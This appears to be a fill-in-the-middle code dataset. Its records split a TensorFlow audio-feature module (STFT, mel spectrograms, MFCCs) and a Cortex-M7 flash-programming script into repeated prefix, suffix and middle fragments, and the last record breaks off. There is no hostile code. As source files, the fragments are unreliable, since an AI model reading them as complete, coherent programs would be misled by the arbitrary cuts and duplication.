return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
) | conditional_block |
audio_processing.py | import os
import tensorflow as tf
def | (file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| get_label | identifier_name |
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
|
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds)) | identifier_body |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
